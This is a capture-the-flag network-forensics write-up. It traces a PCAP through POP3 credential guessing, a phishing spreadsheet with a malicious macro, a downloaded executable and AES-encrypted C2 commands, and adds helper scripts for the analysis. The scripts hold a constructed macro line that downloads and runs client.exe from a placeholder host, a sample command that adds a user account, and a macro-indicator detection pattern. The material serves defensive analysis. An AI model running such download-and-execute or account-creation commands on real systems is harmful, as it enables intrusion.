Pressed

A full-scale intrusion was recently detected within the network, raising critical alarms. - by hadrian3689

The following post by 0xb0b is licensed under CC BY 4.0


A full-scale intrusion was recently detected within the network, raising critical alarms. Fortunately, a packet capture (PCAP) was recorded during the incident, capturing the attacker's initial entry and subsequent actions.

Our task is to analyse the traffic, identify how the attacker gained access, and uncover the sequence of malicious activity.

We download the PCAP file from the box provided and use Wireshark to analyze it.

Analyzing POP3 Traffic

Starting with packet no. 2448 we see POP3 traffic in which someone repeatedly tries to log in with different email addresses and fails each time, the pattern of a credential-guessing attempt against the mail server.

Starting with packet 2886 there is a second POP3 session, and this time the attacker logs in successfully.

We see it was Hazel's account that got compromised. Because this POP3 session runs without TLS, the USER and PASS commands are sent in cleartext, so we can also read the password straight out of the stream.
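Picking the failed and successful logins out of a reassembled POP3 stream is easy to automate. The following script is an added example for this writeup, not code from the original post: the session it parses is a constructed stand-in for what Wireshark's "Follow TCP Stream" shows, and the usernames and password in it are placeholders, not the values from the capture.

```python
"""Pair each POP3 USER/PASS with the server's verdict to find compromised accounts.

Added example, not part of the original writeup. SAMPLE_SESSION is constructed:
("C", ...) is client -> server, ("S", ...) is server -> client, exactly as the
two colours in Wireshark's Follow TCP Stream view.
"""
from dataclasses import dataclass

SAMPLE_SESSION = [  # constructed, placeholder credentials
    ("S", "+OK POP3 server ready"),
    ("C", "USER john@example.invalid"),
    ("S", "+OK"),
    ("C", "PASS Password1"),
    ("S", "-ERR [AUTH] Authentication failed."),
    ("C", "USER bob@example.invalid"),
    ("S", "+OK"),
    ("C", "PASS Password1"),
    ("S", "-ERR [AUTH] Authentication failed."),
    ("C", "USER hazel@example.invalid"),
    ("S", "+OK"),
    ("C", "PASS Winter2024!"),
    ("S", "+OK Logged in."),
    ("C", "RETR 1"),
    ("S", "+OK 1337 octets"),
]


@dataclass
class LoginAttempt:
    user: str
    password: str
    success: bool


def parse_pop3_logins(session):
    """Walk the dialogue and resolve each USER/PASS pair with the next server reply.

    POP3 (RFC 1939) is stateful: the server's reply to PASS is the only line that
    says whether the credentials worked, so the pending USER and PASS are kept
    until that reply arrives. "+OK" means success, "-ERR" means failure.
    """
    attempts = []
    pending_user = None
    pending_pass = None
    for direction, line in session:
        if direction == "C":
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                pending_user = arg
            elif verb == "PASS":
                pending_pass = arg  # cleartext: no TLS on this connection
        elif pending_pass is not None:
            # First server line after PASS is the verdict on this attempt.
            attempts.append(LoginAttempt(pending_user or "", pending_pass,
                                         line.startswith("+OK")))
            pending_user = pending_pass = None
    return attempts


def compromised_accounts(attempts):
    """Only the attempts the server accepted: these are the accounts to reset."""
    return [a for a in attempts if a.success]


if __name__ == "__main__":
    for a in parse_pop3_logins(SAMPLE_SESSION):
        print(f"{'OK ' if a.success else 'ERR'} {a.user} / {a.password}")
```

With a real capture, export the two POP3 conversations from Wireshark as text and tag each line with its direction before feeding it to `parse_pop3_logins`; the failed attempts give the list of guessed accounts and the single successful one gives the compromised mailbox and its password.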

Analysis Of The Attachment

Following the TCP stream from packet 2886 shows the mail the attacker retrieved from the mailbox, in which Hazel is pressured into opening the attached sheets.ods file.

We copy the base64-encoded attachment, which is the sheets.ods file, and decode it.

Opening the file and inspecting its macros, we spot the download and execution of a file called client.exe, as well as a string that is echoed. (An .ods file is just a ZIP archive, and the Basic macros live under Basic/ inside it, so they can be read without opening the document in LibreOffice and risking the macro running.)

This is the first part of the flag.
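The attachment extraction and the macro inspection can be done in one script without ever opening the document in an office application. The example below is added for this writeup and is not code from the original post: the mail, the spreadsheet and the macro it builds are constructed stand-ins for the real message and sheets.ods, and the download address uses the RFC 5737 documentation range, not the attacker's server.

```python
"""Pull the base64 attachment out of the retrieved mail and read its Basic macros.

Added example, not part of the original writeup. The mail, the .ods and the
macro source are all constructed here; only the analysis functions are what
you would point at the real stream.
"""
import email
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from email.message import EmailMessage

SCRIPT_NS = "http://openoffice.org/2000/script"

# Constructed macro standing in for the real one (placeholder URL, RFC 5737 range).
MACRO_SOURCE = (
    "Sub Main\n"
    '    Shell("cmd /c curl http://192.0.2.10/client.exe -o client.exe && client.exe")\n'
    "End Sub\n"
)


def build_sample_ods(macro_source):
    """An .ods is a ZIP: mimetype first, content.xml, and macros under Basic/."""
    module = ET.Element(f"{{{SCRIPT_NS}}}module",
                        {f"{{{SCRIPT_NS}}}name": "Module1",
                         f"{{{SCRIPT_NS}}}language": "StarBasic"})
    module.text = macro_source
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        z.writestr("content.xml", "<office:document-content/>")
        z.writestr("Basic/Standard/Module1.xml", ET.tostring(module, encoding="unicode"))
    return buf.getvalue()


def build_sample_mail(ods_bytes):
    """Constructed mail; add_attachment() base64-encodes it like the bytes in the stream."""
    msg = EmailMessage()
    msg["From"] = "boss@example.invalid"
    msg["To"] = "hazel@example.invalid"
    msg["Subject"] = "Urgent: open the attached sheet now"
    msg.set_content("Hazel, I need these numbers before the call. Open it now.")
    msg.add_attachment(ods_bytes, maintype="application",
                       subtype="vnd.oasis.opendocument.spreadsheet",
                       filename="sheets.ods")
    return msg.as_string()


def extract_attachments(raw_mail):
    """Return {filename: bytes}; get_payload(decode=True) undoes the base64 for us."""
    msg = email.message_from_string(raw_mail)
    return {part.get_filename(): part.get_payload(decode=True)
            for part in msg.walk() if part.get_filename()}


def macro_modules(ods_bytes):
    """Read every Basic module straight out of the archive (skipping the library indexes)."""
    modules = {}
    with zipfile.ZipFile(io.BytesIO(ods_bytes)) as z:
        for name in z.namelist():
            if name.startswith("Basic/") and name.endswith(".xml") and "script-l" not in name:
                modules[name] = ET.fromstring(z.read(name)).text or ""
    return modules


# Indicators worth a second look in any office macro: shell-outs, downloaders, executables.
SUSPICIOUS = re.compile(r"Shell\(|URLDownloadToFile|WScript|cmd /c|powershell|\S+\.exe|echo ",
                        re.IGNORECASE)


def find_suspicious(source):
    return SUSPICIOUS.findall(source)


if __name__ == "__main__":
    mail = build_sample_mail(build_sample_ods(MACRO_SOURCE))
    for fname, data in extract_attachments(mail).items():
        print(f"attachment {fname}: {len(data)} bytes, magic {data[:2]!r}")
        for path, src in macro_modules(data).items():
            print(f"--- {path}\n{src}\nhits: {find_suspicious(src)}")
```

For the real capture, save the raw mail from the POP3 stream to a file and pass its text to `extract_attachments`; the ZIP magic `PK` at the start of the decoded bytes confirms the base64 was copied completely.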

Tracing The File Download

Now that we know a file is downloaded and executed, we look for that download in the capture to find the next part of the flag.

We see the download happens at packet no. 2962.

We follow the TCP stream, switch the "Show data as" option from ASCII to Raw, and save the raw stream to a file. Select only the server-to-client direction before saving; otherwise the client's HTTP request ends up in the file in front of the executable.

Decompilation Of The Malicious File

We remove everything before the MZ magic bytes, i.e. the HTTP response headers, so that the file starts with the DOS header.

This was originally done in nano, but nano's way of removing lines (Ctrl+K) behaves differently from Vim's dd, and the file produced by nano could not be processed properly by Ghidra later. Use Vim instead! More robust than either editor is to cut at the byte offset of the MZ header (with dd or a short script), so that no text editor touches the binary at all.
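Cutting the executable out of the saved stream by byte offset, and validating the header before trusting it, avoids the editor problem entirely. The script below is an added example for this writeup, not code from the original post; the HTTP response and the PE image it builds are constructed (the "PE" is only a header, not a working program), and it deliberately plants a stray "MZ" in the headers to show why the first match should not be taken blindly.

```python
"""Carve the downloaded PE out of the saved raw HTTP stream by offset.

Added example, not part of the original writeup. build_sample_stream() is a
constructed stand-in for the server->client half of the packet 2962 download.
"""
import struct


def build_sample_stream():
    """Constructed HTTP response carrying a minimal (header-only) PE image."""
    dos_header = bytearray(64)
    dos_header[0:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x40)  # e_lfanew: NT headers at 0x40
    pe = bytes(dos_header) + b"PE\0\0" + b"\x4c\x01" + b"\0" * 58  # Machine = i386
    http = (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: application/octet-stream\r\n"
            b"ETag: \"MZ-decoy\"\r\n"  # a stray "MZ" before the real header
            b"Content-Length: %d\r\n\r\n" % len(pe))
    return http + pe, pe


def is_pe(data, off):
    """True if data[off:] starts with a DOS header whose e_lfanew points at "PE\\0\\0"."""
    if data[off:off + 2] != b"MZ" or off + 0x40 > len(data):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, off + 0x3C)
    sig = off + e_lfanew
    return sig + 4 <= len(data) and data[sig:sig + 4] == b"PE\0\0"


def carve_pe(stream):
    """Bytes from the first *validated* MZ header to the end of the stream, or None."""
    off = stream.find(b"MZ")
    while off != -1:
        if is_pe(stream, off):
            return stream[off:]
        off = stream.find(b"MZ", off + 1)  # skip decoys like the one in the ETag
    return None


def carve_http_body(stream):
    """Alternative: trust the HTTP framing and honour Content-Length."""
    head, sep, body = stream.partition(b"\r\n\r\n")
    if not sep:
        return None
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return body[:int(line.split(b":", 1)[1])]
    return body


if __name__ == "__main__":
    import sys
    # Usage: python carve.py saved_stream.bin client.exe  (defaults to the sample)
    stream = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_stream()[0]
    pe = carve_pe(stream)
    if pe is None:
        sys.exit("no PE header found in the stream")
    print(f"PE starts at offset {len(stream) - len(pe)}, {len(pe)} bytes")
    if len(sys.argv) > 2:
        open(sys.argv[2], "wb").write(pe)
```

Both carving methods should agree on a clean stream; if `carve_pe` returns more than `carve_http_body`, the saved file still contains trailing data from another response in the same connection.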

Using Ghidra, we analyze the executable and inspect the main function.

Here we see a socket connection being set up to port 443, which we will find later in the PCAP. Since the payloads can later be decrypted straight from the TCP stream, the port is chosen to blend in with HTTPS rather than because TLS is in use.

Furthermore, the command execution is wrapped in AES encryption.

At the top of the main function we spot the use of a key variable.

Double-clicking on rhI1YazJLaLVgWv4 takes us to the values used for the encryption.

Decryption Of The C2 Traffic

Back to our traffic on port 443:

We inspect packets 6728 and 6729 and copy the value of the TCP payload...

... and use CyberChef to decrypt the payload with the values recovered from the binary. The first command issued turns out to be whoami:

And also its corresponding output:
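Pasting every payload into CyberChef by hand works for a handful of packets; for the whole session it is quicker to script the decryption. The example below is added for this writeup and is not code from the original post. Its key, IV, mode (AES-128-CBC with PKCS#7 padding) and the "captured" payloads are all constructed assumptions: substitute the values Ghidra shows behind rhI1YazJLaLVgWv4 and the hex copied from Wireshark's TCP payload field. It needs pycryptodome or cryptography for the AES primitive.

```python
"""Decrypt the implant's C2 payloads in bulk instead of one CyberChef paste at a time.

Added example, not part of the original writeup. KEY, IV, the CBC/PKCS#7
assumption and SAMPLE_PAYLOADS are constructed placeholders, not values
recovered from the real binary or capture.
"""
try:
    from Crypto.Cipher import AES  # pycryptodome

    def _aes_cbc(key, iv, data, encrypt):
        c = AES.new(key, AES.MODE_CBC, iv)
        return c.encrypt(data) if encrypt else c.decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key, iv, data, encrypt):
        c = Cipher(algorithms.AES(key), modes.CBC(iv))
        op = c.encryptor() if encrypt else c.decryptor()
        return op.update(data) + op.finalize()

KEY = b"0123456789abcdef"  # constructed placeholder, 16 bytes -> AES-128
IV = b"fedcba9876543210"   # constructed placeholder


def pkcs7_pad(b):
    n = 16 - len(b) % 16
    return b + bytes([n]) * n


def pkcs7_unpad(b):
    n = b[-1] if b else 0
    if not 1 <= n <= 16 or b[-n:] != bytes([n]) * n:
        raise ValueError("bad padding: wrong key/IV, or this packet is not an AES-CBC payload")
    return b[:-n]


def encrypt_payload(plaintext, key=KEY, iv=IV):
    """What the implant does before send(); used here only to construct sample traffic."""
    return _aes_cbc(key, iv, pkcs7_pad(plaintext.encode()), True)


def decrypt_payload(payload_hex, key=KEY, iv=IV):
    """Take the hex copied from Wireshark ("61:62:..." or "6162...") and return the text."""
    ct = bytes.fromhex(payload_hex.replace(":", "").replace(" ", ""))
    if not ct or len(ct) % 16:
        raise ValueError("payload length is not a multiple of the AES block size")
    return pkcs7_unpad(_aes_cbc(key, iv, ct, False)).decode("utf-8", "replace")


def is_valid_payload(payload_hex, key=KEY, iv=IV):
    """Cheap filter: does this TCP payload decrypt cleanly under the recovered key?"""
    try:
        decrypt_payload(payload_hex, key, iv)
        return True
    except ValueError:
        return False


# Constructed stand-in for the packet 6728 onwards exchange: command, then its output.
SAMPLE_PAYLOADS = [
    ("6728", encrypt_payload("whoami").hex()),
    ("6729", encrypt_payload("desktop-01\\hazel").hex()),
    ("6731", encrypt_payload("net user analyst Passw0rd /add").hex()),
]


def decrypt_session(payloads, key=KEY, iv=IV):
    """(packet number, plaintext) for every payload, in capture order."""
    return [(pkt, decrypt_payload(h, key, iv)) for pkt, h in payloads]


if __name__ == "__main__":
    for pkt, text in decrypt_session(SAMPLE_PAYLOADS):
        print(f"packet {pkt}: {text}")
```

With the real capture, a `tshark -r file.pcap -Y 'tcp.port == 443' -T fields -e frame.number -e tcp.payload` export gives exactly the (packet, hex) pairs that `decrypt_session` expects, and `is_valid_payload` separates the encrypted C2 messages from any handshake or keep-alive bytes on the same connection.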

In packet no. 6731 we see the creation of another user account,

which happens to be the second part of the flag.

We move on with each command issued:

Packet no. 6735:

Packet no. 6741:

Packet no. 6743 - reading clients.csv:

Packet no. 6744 output of clients.csv contains the final part of the flag:

For the final flag we put everything together and base64 decode it.
